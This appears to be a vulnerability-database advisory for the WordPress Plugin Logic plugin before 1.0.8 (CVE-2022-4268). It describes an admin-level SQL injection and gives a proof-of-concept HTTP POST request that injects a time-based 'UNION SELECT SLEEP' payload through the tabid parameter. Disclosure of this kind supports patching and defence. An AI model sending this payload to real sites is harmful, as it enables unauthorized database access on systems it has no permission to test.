Lucene search
Kunal SharmaWPEX-ID:BDE93D90-1178-4D55-AEA9-E02C4F8BCAA2HistoryDec 02, 2022 - 12:00 a.m.
Plugin Logic < 1.0.8 - Admin+ SQLi
2022-12-0200:00:00
Kunal Sharma
89
plugin logic
admin
sql injection
vulnerability
version
exploit
post request
cookie
content type
EPSS
0.001
Percentile
43.3%
The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin
POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%20union%20SELECT%20SLEEP(16)%3b%23 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Cookie: [admin+]
plulo_checklist%5B0%5D=0&plulo_checklist%5B0%5D=1&plulo_radiolist%5B0%5D=0&plulo_txt_list%5B0%5D=&plulo_submit=Save+Changes
Related
wpvulndb
wpvulndb
Plugin Logic < 1.0.8 - Admin+ SQLi
2022-12-02 00:00:00
cvelist
cvelist
CVE-2022-4268 Plugin Logic < 1.0.8 - Admin+ SQLi
2022-12-26 12:27:56
cve
cve
CVE-2022-4268
2022-12-26 13:15:14
prion
prion
Sql injection
2022-12-26 13:15:00
nvd
nvd
CVE-2022-4268
2022-12-26 13:15:14